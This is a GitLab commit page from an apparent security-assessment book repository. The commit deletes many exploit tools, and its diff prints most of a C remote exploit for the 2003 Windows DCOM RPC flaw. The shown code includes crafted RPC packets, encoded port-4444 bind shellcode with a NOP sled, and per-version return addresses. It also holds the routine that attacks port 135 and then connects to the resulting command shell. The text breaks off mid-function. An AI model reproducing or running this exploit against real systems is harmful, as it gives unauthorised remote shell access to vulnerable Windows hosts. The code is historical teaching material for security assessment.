Skip to content
GitLab
Projects
Groups
Snippets
Help
Loading...
Help
Help
Support
Community forum
Keyboard shortcuts
?
Submit feedback
Contribute to GitLab
Sign in
Toggle navigation
Open sidebar
examples
Network Security Assessment
Commits
3388c197
Commit
3388c197
authored
May 08, 2018
by
Dan Fauxsmith
Browse files
repo cleanup
parent
8c67185a
Changes
758
Hide whitespace changes
Inline
Side-by-side
Showing
20 changed files
with
0 additions
and
2810 deletions
+0
-2810
9780596006112
9780596006112
+0
-1
code/example-code.zip
code/example-code.zip
+0
-0
tools/0x82-dcomrpc_usemgret.c
tools/0x82-dcomrpc_usemgret.c
+0
-515
tools/0x82-wu262.c
tools/0x82-wu262.c
+0
-702
tools/1365.pl
tools/1365.pl
+0
-163
tools/1455.sql
tools/1455.sql
+0
-87
tools/1719.sql
tools/1719.sql
+0
-60
tools/2837.sql
tools/2837.sql
+0
-100
tools/2951.sql
tools/2951.sql
+0
-91
tools/2959.sql
tools/2959.sql
+0
-77
tools/3177.sql
tools/3177.sql
+0
-46
tools/3178.sql
tools/3178.sql
+0
-42
tools/3179.sql
tools/3179.sql
+0
-42
tools/3269.pl
tools/3269.pl
+0
-120
tools/3358.pl
tools/3358.pl
+0
-125
tools/3359.pl
tools/3359.pl
+0
-125
tools/3363.pl
tools/3363.pl
+0
-122
tools/3364.pl
tools/3364.pl
+0
-116
tools/3375.pl
tools/3375.pl
+0
-140
tools/3376.pl
tools/3376.pl
+0
-136
No files found.
9780596006112
deleted
120000 → 0
View file @
8c67185a
9780596006112
\ No newline at end of file
code/example-code.zip
0 → 100644
View file @
3388c197
File added
tools/0x82-dcomrpc_usemgret.c
deleted
100644 → 0
View file @
8c67185a
/*
**
** 2003/07/27 - DCOM RPC WIN32 remote exploit (Most languages)
**
** FlashSky/Benjurry and, H D Moore's code is very excellent.
** It works well even if change only return address.
** I didn't feel necessity for new make.
**
** Thankful to them.
**
** 2003/07/30 - Update, Added magic return address.
**
** kokanin supplied very excellent information:
** URL: http://lists.netsys.com/pipermail/full-disclosure/2003-July/012000.html
**
** * As well as Korean thanks to, a lot of systems can exploit.
**
** --
** Thank you.
**
** P.S: Sorry, for my poor english.
**
** --
** exploit by "you dong-hun"(Xpl017Elz), <szoahc@hotmail.com>.
** My World: http://x82.i21c.net & http://x82.inetcop.org
*/
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/socket.h>
u_char
bindstr
[]
=
{
0x05
,
0x00
,
0x0B
,
0x03
,
0x10
,
0x00
,
0x00
,
0x00
,
0x48
,
0x00
,
0x00
,
0x00
,
0x7F
,
0x00
,
0x00
,
0x00
,
0xD0
,
0x16
,
0xD0
,
0x16
,
0x00
,
0x00
,
0x00
,
0x00
,
0x01
,
0x00
,
0x00
,
0x00
,
0x01
,
0x00
,
0x01
,
0x00
,
0xa0
,
0x01
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0xC0
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x46
,
0x00
,
0x00
,
0x00
,
0x00
,
0x04
,
0x5D
,
0x88
,
0x8A
,
0xEB
,
0x1C
,
0xC9
,
0x11
,
0x9F
,
0xE8
,
0x08
,
0x00
,
0x2B
,
0x10
,
0x48
,
0x60
,
0x02
,
0x00
,
0x00
,
0x00
};
u_char
request1
[]
=
{
0x05
,
0x00
,
0x00
,
0x03
,
0x10
,
0x00
,
0x00
,
0x00
,
0xE8
,
0x03
,
0x00
,
0x00
,
0xE5
,
0x00
,
0x00
,
0x00
,
0xD0
,
0x03
,
0x00
,
0x00
,
0x01
,
0x00
,
0x04
,
0x00
,
0x05
,
0x00
,
0x06
,
0x00
,
0x01
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x32
,
0x24
,
0x58
,
0xFD
,
0xCC
,
0x45
,
0x64
,
0x49
,
0xB0
,
0x70
,
0xDD
,
0xAE
,
0x74
,
0x2C
,
0x96
,
0xD2
,
0x60
,
0x5E
,
0x0D
,
0x00
,
0x01
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x70
,
0x5E
,
0x0D
,
0x00
,
0x02
,
0x00
,
0x00
,
0x00
,
0x7C
,
0x5E
,
0x0D
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x10
,
0x00
,
0x00
,
0x00
,
0x80
,
0x96
,
0xF1
,
0xF1
,
0x2A
,
0x4D
,
0xCE
,
0x11
,
0xA6
,
0x6A
,
0x00
,
0x20
,
0xAF
,
0x6E
,
0x72
,
0xF4
,
0x0C
,
0x00
,
0x00
,
0x00
,
0x4D
,
0x41
,
0x52
,
0x42
,
0x01
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x0D
,
0xF0
,
0xAD
,
0xBA
,
0x00
,
0x00
,
0x00
,
0x00
,
0xA8
,
0xF4
,
0x0B
,
0x00
,
0x60
,
0x03
,
0x00
,
0x00
,
0x60
,
0x03
,
0x00
,
0x00
,
0x4D
,
0x45
,
0x4F
,
0x57
,
0x04
,
0x00
,
0x00
,
0x00
,
0xA2
,
0x01
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0xC0
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x46
,
0x38
,
0x03
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0xC0
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x46
,
0x00
,
0x00
,
0x00
,
0x00
,
0x30
,
0x03
,
0x00
,
0x00
,
0x28
,
0x03
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x01
,
0x10
,
0x08
,
0x00
,
0xCC
,
0xCC
,
0xCC
,
0xCC
,
0xC8
,
0x00
,
0x00
,
0x00
,
0x4D
,
0x45
,
0x4F
,
0x57
,
0x28
,
0x03
,
0x00
,
0x00
,
0xD8
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x02
,
0x00
,
0x00
,
0x00
,
0x07
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0xC4
,
0x28
,
0xCD
,
0x00
,
0x64
,
0x29
,
0xCD
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x07
,
0x00
,
0x00
,
0x00
,
0xB9
,
0x01
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0xC0
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x46
,
0xAB
,
0x01
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0xC0
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x46
,
0xA5
,
0x01
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0xC0
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x46
,
0xA6
,
0x01
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0xC0
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x46
,
0xA4
,
0x01
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0xC0
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x46
,
0xAD
,
0x01
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0xC0
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x46
,
0xAA
,
0x01
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0xC0
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x46
,
0x07
,
0x00
,
0x00
,
0x00
,
0x60
,
0x00
,
0x00
,
0x00
,
0x58
,
0x00
,
0x00
,
0x00
,
0x90
,
0x00
,
0x00
,
0x00
,
0x40
,
0x00
,
0x00
,
0x00
,
0x20
,
0x00
,
0x00
,
0x00
,
0x78
,
0x00
,
0x00
,
0x00
,
0x30
,
0x00
,
0x00
,
0x00
,
0x01
,
0x00
,
0x00
,
0x00
,
0x01
,
0x10
,
0x08
,
0x00
,
0xCC
,
0xCC
,
0xCC
,
0xCC
,
0x50
,
0x00
,
0x00
,
0x00
,
0x4F
,
0xB6
,
0x88
,
0x20
,
0xFF
,
0xFF
,
0xFF
,
0xFF
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x01
,
0x10
,
0x08
,
0x00
,
0xCC
,
0xCC
,
0xCC
,
0xCC
,
0x48
,
0x00
,
0x00
,
0x00
,
0x07
,
0x00
,
0x66
,
0x00
,
0x06
,
0x09
,
0x02
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0xC0
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x46
,
0x10
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x01
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x78
,
0x19
,
0x0C
,
0x00
,
0x58
,
0x00
,
0x00
,
0x00
,
0x05
,
0x00
,
0x06
,
0x00
,
0x01
,
0x00
,
0x00
,
0x00
,
0x70
,
0xD8
,
0x98
,
0x93
,
0x98
,
0x4F
,
0xD2
,
0x11
,
0xA9
,
0x3D
,
0xBE
,
0x57
,
0xB2
,
0x00
,
0x00
,
0x00
,
0x32
,
0x00
,
0x31
,
0x00
,
0x01
,
0x10
,
0x08
,
0x00
,
0xCC
,
0xCC
,
0xCC
,
0xCC
,
0x80
,
0x00
,
0x00
,
0x00
,
0x0D
,
0xF0
,
0xAD
,
0xBA
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x18
,
0x43
,
0x14
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x60
,
0x00
,
0x00
,
0x00
,
0x60
,
0x00
,
0x00
,
0x00
,
0x4D
,
0x45
,
0x4F
,
0x57
,
0x04
,
0x00
,
0x00
,
0x00
,
0xC0
,
0x01
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0xC0
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x46
,
0x3B
,
0x03
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0xC0
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x46
,
0x00
,
0x00
,
0x00
,
0x00
,
0x30
,
0x00
,
0x00
,
0x00
,
0x01
,
0x00
,
0x01
,
0x00
,
0x81
,
0xC5
,
0x17
,
0x03
,
0x80
,
0x0E
,
0xE9
,
0x4A
,
0x99
,
0x99
,
0xF1
,
0x8A
,
0x50
,
0x6F
,
0x7A
,
0x85
,
0x02
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x01
,
0x00
,
0x00
,
0x00
,
0x01
,
0x10
,
0x08
,
0x00
,
0xCC
,
0xCC
,
0xCC
,
0xCC
,
0x30
,
0x00
,
0x00
,
0x00
,
0x78
,
0x00
,
0x6E
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0xD8
,
0xDA
,
0x0D
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x20
,
0x2F
,
0x0C
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x03
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x03
,
0x00
,
0x00
,
0x00
,
0x46
,
0x00
,
0x58
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x01
,
0x10
,
0x08
,
0x00
,
0xCC
,
0xCC
,
0xCC
,
0xCC
,
0x10
,
0x00
,
0x00
,
0x00
,
0x30
,
0x00
,
0x2E
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x01
,
0x10
,
0x08
,
0x00
,
0xCC
,
0xCC
,
0xCC
,
0xCC
,
0x68
,
0x00
,
0x00
,
0x00
,
0x0E
,
0x00
,
0xFF
,
0xFF
,
0x68
,
0x8B
,
0x0B
,
0x00
,
0x02
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
};
u_char
request2
[]
=
{
0x20
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x20
,
0x00
,
0x00
,
0x00
,
0x5C
,
0x00
,
0x5C
,
0x00
};
u_char
request3
[]
=
{
0x5C
,
0x00
,
0x43
,
0x00
,
0x24
,
0x00
,
0x5C
,
0x00
,
0x31
,
0x00
,
0x32
,
0x00
,
0x33
,
0x00
,
0x34
,
0x00
,
0x35
,
0x00
,
0x36
,
0x00
,
0x31
,
0x00
,
0x31
,
0x00
,
0x31
,
0x00
,
0x31
,
0x00
,
0x31
,
0x00
,
0x31
,
0x00
,
0x31
,
0x00
,
0x31
,
0x00
,
0x31
,
0x00
,
0x31
,
0x00
,
0x31
,
0x00
,
0x31
,
0x00
,
0x31
,
0x00
,
0x31
,
0x00
,
0x31
,
0x00
,
0x2E
,
0x00
,
0x64
,
0x00
,
0x6F
,
0x00
,
0x63
,
0x00
,
0x00
,
0x00
};
u_char
request4
[]
=
{
0x01
,
0x10
,
0x08
,
0x00
,
0xCC
,
0xCC
,
0xCC
,
0xCC
,
0x20
,
0x00
,
0x00
,
0x00
,
0x30
,
0x00
,
0x2D
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x88
,
0x2A
,
0x0C
,
0x00
,
0x02
,
0x00
,
0x00
,
0x00
,
0x01
,
0x00
,
0x00
,
0x00
,
0x28
,
0x8C
,
0x0C
,
0x00
,
0x01
,
0x00
,
0x00
,
0x00
,
0x07
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
,
0x00
};
u_char
shellcode
[]
=
{
/* port 4444 bind shellcode */
0x46
,
0x00
,
0x58
,
0x00
,
0x4e
,
0x00
,
0x42
,
0x00
,
0x46
,
0x00
,
0x58
,
0x00
,
0x46
,
0x00
,
0x58
,
0x00
,
0x4e
,
0x00
,
0x42
,
0x00
,
0x46
,
0x00
,
0x58
,
0x00
,
0x46
,
0x00
,
0x58
,
0x00
,
0x46
,
0x00
,
0x58
,
0x00
,
0x46
,
0x00
,
0x58
,
0x00
,
0xff
,
0xff
,
0xff
,
0xff
,
0xcc
,
0xe0
,
0xfd
,
0x7f
,
0xcc
,
0xe0
,
0xfd
,
0x7f
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0x90
,
0xeb
,
0x19
,
0x5e
,
0x31
,
0xc9
,
0x81
,
0xe9
,
0x89
,
0xff
,
0xff
,
0xff
,
0x81
,
0x36
,
0x80
,
0xbf
,
0x32
,
0x94
,
0x81
,
0xee
,
0xfc
,
0xff
,
0xff
,
0xff
,
0xe2
,
0xf2
,
0xeb
,
0x05
,
0xe8
,
0xe2
,
0xff
,
0xff
,
0xff
,
0x03
,
0x53
,
0x06
,
0x1f
,
0x74
,
0x57
,
0x75
,
0x95
,
0x80
,
0xbf
,
0xbb
,
0x92
,
0x7f
,
0x89
,
0x5a
,
0x1a
,
0xce
,
0xb1
,
0xde
,
0x7c
,
0xe1
,
0xbe
,
0x32
,
0x94
,
0x09
,
0xf9
,
0x3a
,
0x6b
,
0xb6
,
0xd7
,
0x9f
,
0x4d
,
0x85
,
0x71
,
0xda
,
0xc6
,
0x81
,
0xbf
,
0x32
,
0x1d
,
0xc6
,
0xb3
,
0x5a
,
0xf8
,
0xec
,
0xbf
,
0x32
,
0xfc
,
0xb3
,
0x8d
,
0x1c
,
0xf0
,
0xe8
,
0xc8
,
0x41
,
0xa6
,
0xdf
,
0xeb
,
0xcd
,
0xc2
,
0x88
,
0x36
,
0x74
,
0x90
,
0x7f
,
0x89
,
0x5a
,
0xe6
,
0x7e
,
0x0c
,
0x24
,
0x7c
,
0xad
,
0xbe
,
0x32
,
0x94
,
0x09
,
0xf9
,
0x22
,
0x6b
,
0xb6
,
0xd7
,
0x4c
,
0x4c
,
0x62
,
0xcc
,
0xda
,
0x8a
,
0x81
,
0xbf
,
0x32
,
0x1d
,
0xc6
,
0xab
,
0xcd
,
0xe2
,
0x84
,
0xd7
,
0xf9
,
0x79
,
0x7c
,
0x84
,
0xda
,
0x9a
,
0x81
,
0xbf
,
0x32
,
0x1d
,
0xc6
,
0xa7
,
0xcd
,
0xe2
,
0x84
,
0xd7
,
0xeb
,
0x9d
,
0x75
,
0x12
,
0xda
,
0x6a
,
0x80
,
0xbf
,
0x32
,
0x1d
,
0xc6
,
0xa3
,
0xcd
,
0xe2
,
0x84
,
0xd7
,
0x96
,
0x8e
,
0xf0
,
0x78
,
0xda
,
0x7a
,
0x80
,
0xbf
,
0x32
,
0x1d
,
0xc6
,
0x9f
,
0xcd
,
0xe2
,
0x84
,
0xd7
,
0x96
,
0x39
,
0xae
,
0x56
,
0xda
,
0x4a
,
0x80
,
0xbf
,
0x32
,
0x1d
,
0xc6
,
0x9b
,
0xcd
,
0xe2
,
0x84
,
0xd7
,
0xd7
,
0xdd
,
0x06
,
0xf6
,
0xda
,
0x5a
,
0x80
,
0xbf
,
0x32
,
0x1d
,
0xc6
,
0x97
,
0xcd
,
0xe2
,
0x84
,
0xd7
,
0xd5
,
0xed
,
0x46
,
0xc6
,
0xda
,
0x2a
,
0x80
,
0xbf
,
0x32
,
0x1d
,
0xc6
,
0x93
,
0x01
,
0x6b
,
0x01
,
0x53
,
0xa2
,
0x95
,
0x80
,
0xbf
,
0x66
,
0xfc
,
0x81
,
0xbe
,
0x32
,
0x94
,
0x7f
,
0xe9
,
0x2a
,
0xc4
,
0xd0
,
0xef
,
0x62
,
0xd4
,
0xd0
,
0xff
,
0x62
,
0x6b
,
0xd6
,
0xa3
,
0xb9
,
0x4c
,
0xd7
,
0xe8
,
0x5a
,
0x96
,
0x80
,
0xae
,
0x6e
,
0x1f
,
0x4c
,
0xd5
,
0x24
,
0xc5
,
0xd3
,
0x40
,
0x64
,
0xb4
,
0xd7
,
0xec
,
0xcd
,
0xc2
,
0xa4
,
0xe8
,
0x63
,
0xc7
,
0x7f
,
0xe9
,
0x1a
,
0x1f
,
0x50
,
0xd7
,
0x57
,
0xec
,
0xe5
,
0xbf
,
0x5a
,
0xf7
,
0xed
,
0xdb
,
0x1c
,
0x1d
,
0xe6
,
0x8f
,
0xb1
,
0x78
,
0xd4
,
0x32
,
0x0e
,
0xb0
,
0xb3
,
0x7f
,
0x01
,
0x5d
,
0x03
,
0x7e
,
0x27
,
0x3f
,
0x62
,
0x42
,
0xf4
,
0xd0
,
0xa4
,
0xaf
,
0x76
,
0x6a
,
0xc4
,
0x9b
,
0x0f
,
0x1d
,
0xd4
,
0x9b
,
0x7a
,
0x1d
,
0xd4
,
0x9b
,
0x7e
,
0x1d
,
0xd4
,
0x9b
,
0x62
,
0x19
,
0xc4
,
0x9b
,
0x22
,
0xc0
,
0xd0
,
0xee
,
0x63
,
0xc5
,
0xea
,
0xbe
,
0x63
,
0xc5
,
0x7f
,
0xc9
,
0x02
,
0xc5
,
0x7f
,
0xe9
,
0x22
,
0x1f
,
0x4c
,
0xd5
,
0xcd
,
0x6b
,
0xb1
,
0x40
,
0x64
,
0x98
,
0x0b
,
0x77
,
0x65
,
0x6b
,
0xd6
,
0x93
,
0xcd
,
0xc2
,
0x94
,
0xea
,
0x64
,
0xf0
,
0x21
,
0x8f
,
0x32
,
0x94
,
0x80
,
0x3a
,
0xf2
,
0xec
,
0x8c
,
0x34
,
0x72
,
0x98
,
0x0b
,
0xcf
,
0x2e
,
0x39
,
0x0b
,
0xd7
,
0x3a
,
0x7f
,
0x89
,
0x34
,
0x72
,
0xa0
,
0x0b
,
0x17
,
0x8a
,
0x94
,
0x80
,
0xbf
,
0xb9
,
0x51
,
0xde
,
0xe2
,
0xf0
,
0x90
,
0x80
,
0xec
,
0x67
,
0xc2
,
0xd7
,
0x34
,
0x5e
,
0xb0
,
0x98
,
0x34
,
0x77
,
0xa8
,
0x0b
,
0xeb
,
0x37
,
0xec
,
0x83
,
0x6a
,
0xb9
,
0xde
,
0x98
,
0x34
,
0x68
,
0xb4
,
0x83
,
0x62
,
0xd1
,
0xa6
,
0xc9
,
0x34
,
0x06
,
0x1f
,
0x83
,
0x4a
,
0x01
,
0x6b
,
0x7c
,
0x8c
,
0xf2
,
0x38
,
0xba
,
0x7b
,
0x46
,
0x93
,
0x41
,
0x70
,
0x3f
,
0x97
,
0x78
,
0x54
,
0xc0
,
0xaf
,
0xfc
,
0x9b
,
0x26
,
0xe1
,
0x61
,
0x34
,
0x68
,
0xb0
,
0x83
,
0x62
,
0x54
,
0x1f
,
0x8c
,
0xf4
,
0xb9
,
0xce
,
0x9c
,
0xbc
,
0xef
,
0x1f
,
0x84
,
0x34
,
0x31
,
0x51
,
0x6b
,
0xbd
,
0x01
,
0x54
,
0x0b
,
0x6a
,
0x6d
,
0xca
,
0xdd
,
0xe4
,
0xf0
,
0x90
,
0x80
,
0x2f
,
0xa2
,
0x04
,
0x00
};
struct
os_plat_pk
{
int
op_pk_num
;
char
*
op_pk_str
;
u_long
retloc_jmp_esp
;
};
struct
os_plat_pk
__pt_pkg_form
[]
=
{
{
0
,
"Windows 2000 magic version 1"
,
0x0018759F
},
{
1
,
"Windows 2000 magic version 2"
,
0x001875E3
},
{
2
,
"Windows 2000 magic version 3"
,
0x001F0CD0
},
{
3
,
"Windows 2000 magic version 4"
,
0x010016C6
},
{
4
,
"Windows 2000 magic version 5"
,
0x010016CB
},
{
0x82
,
NULL
,
0
}
};
#define DEF_STR "It's test"
#define DEF_BF (0x1000)
#define DEF_SZ (0xff)
#define GET_SZ (0x400)
int
sexsock
(
char
*
conn_host_nm
,
int
conn_port_nm
);
void
start_shell
(
int
st_sock_va
);
void
re_connt_lm
(
int
st_sock_va
);
void
pri_usg
(
char
*
f_nm
);
void
pri_banrl
();
int
main
(
int
argc
,
char
*
argv
[])
{
int
sock
,
type_def
=
(
0
),
r_r1
,
r_r2
,
whgl
;
u_long
retloc_jmp_esp
=
(
__pt_pkg_form
[
type_def
].
retloc_jmp_esp
);
u_char
get_bf
[(
DEF_BF
)],
atk_bf
[(
DEF_BF
)];
char
def_host
[(
DEF_SZ
)]
=
(
DEF_STR
);
(
void
)
pri_banrl
();
while
((
whgl
=
getopt
(
argc
,
argv
,
"T:t:H:h:Ii"
))
!=
EOF
)
{
switch
(
whgl
)
{
case
'T'
:
case
't'
:
if
((
type_def
=
atoi
(
optarg
))
>
4
)
{
(
void
)
pri_usg
(
argv
[
0
]);
}
else
retloc_jmp_esp
=
(
__pt_pkg_form
[
type_def
].
retloc_jmp_esp
);
break
;
case
'H'
:
case
'h'
:
memset
((
char
*
)
def_host
,
0
,
sizeof
(
def_host
));
strncpy
(
def_host
,
optarg
,
sizeof
(
def_host
)
-
1
);
break
;
case
'I'
:
case
'i'
:
(
void
)
pri_usg
(
argv
[
0
]);
break
;
case
'?'
:
(
void
)
pri_usg
(
argv
[
0
]);
break
;
}
}
if
(
strstr
(
def_host
,(
DEF_STR
)))
{
(
void
)
pri_usg
(
argv
[
0
]);
}
fprintf
(
stdout
,
" [*] Target: %s.
\n
"
,
__pt_pkg_form
[
type_def
].
op_pk_str
);
fprintf
(
stdout
,
" [0] Add return address.
\n
"
);
memcpy
((
u_char
*
)
shellcode
+
36
,(
u_char
*
)
&
retloc_jmp_esp
,
4
);
fprintf
(
stdout
,
" [1] Start, shellcode setting.
\n
"
);
memcpy
((
u_char
*
)
atk_bf
,
request1
,
sizeof
(
request1
));
r_r1
=
sizeof
(
request1
);
r_r2
=
sizeof
(
shellcode
)
/
2
;
#define QIK_SHIFT(v,x,l) *(u_long *)(v+x)=*(u_long *)(v+x)+l
QIK_SHIFT
(
request2
,
0
,
r_r2
);
QIK_SHIFT
(
request2
,
8
,
r_r2
);
memcpy
((
u_char
*
)
atk_bf
+
r_r1
,
request2
,
sizeof
(
request2
));
r_r1
+=
sizeof
(
request2
);
memcpy
((
u_char
*
)
atk_bf
+
r_r1
,
shellcode
,
sizeof
(
shellcode
));
r_r1
+=
sizeof
(
shellcode
);
memcpy
((
u_char
*
)
atk_bf
+
r_r1
,
request3
,
sizeof
(
request3
));
r_r1
+=
sizeof
(
request3
);
memcpy
((
u_char
*
)
atk_bf
+
r_r1
,
request4
,
sizeof
(
request4
));
r_r1
+=
sizeof
(
request4
);
r_r2
=
sizeof
(
shellcode
)
-
12
;
QIK_SHIFT
(
atk_bf
,
8
,
r_r2
);
QIK_SHIFT
(
atk_bf
,
16
,
r_r2
);
QIK_SHIFT
(
atk_bf
,
128
,
r_r2
);
QIK_SHIFT
(
atk_bf
,
132
,
r_r2
);
QIK_SHIFT
(
atk_bf
,
180
,
r_r2
);
QIK_SHIFT
(
atk_bf
,
184
,
r_r2
);
QIK_SHIFT
(
atk_bf
,
208
,
r_r2
);
QIK_SHIFT
(
atk_bf
,
396
,
r_r2
);
fprintf
(
stdout
,
" [2] Trying %s:135 ...
\n
"
,
def_host
);
sock
=
(
int
)
sexsock
(
def_host
,(
135
));
(
void
)
re_connt_lm
(
sock
);
fprintf
(
stdout
,
" [3] Connected to %s:135.
\n
"
,
def_host
);
send
(
sock
,
bindstr
,
sizeof
(
bindstr
),
0
);
recv
(
sock
,
get_bf
,
sizeof
(
get_bf
),
0
);
fprintf
(
stdout
,
" [4] Send, attack code.
\n
"
);
send
(
sock
,
atk_bf
,
r_r1
,
0
);
close
(
sock
);
fprintf
(
stdout
,
" [5] OK, Trying %s:4444 ...
\n
"
,
def_host
);
fprintf
(
stdout
,
" [*] Waiting, cmd shell "
);
fflush
(
stdout
);
sleep
(
1
);
fprintf
(
stdout
,
"."
);
fflush
(
stdout
);
sleep
(
1
);
fprintf
(
stdout
,
"."
);
fflush
(
stdout
);
sleep
(
1
);
fprintf
(
stdout
,
".
\n
"
);
sock
=
(
int
)
sexsock
(
def_host
,(
4444
));
(
void
)
re_connt_lm
(
sock
);
(
void
)
start_shell
(
sock
);
exit
(
0
);
}
int
sexsock
(
char
*
conn_host_nm
,
int
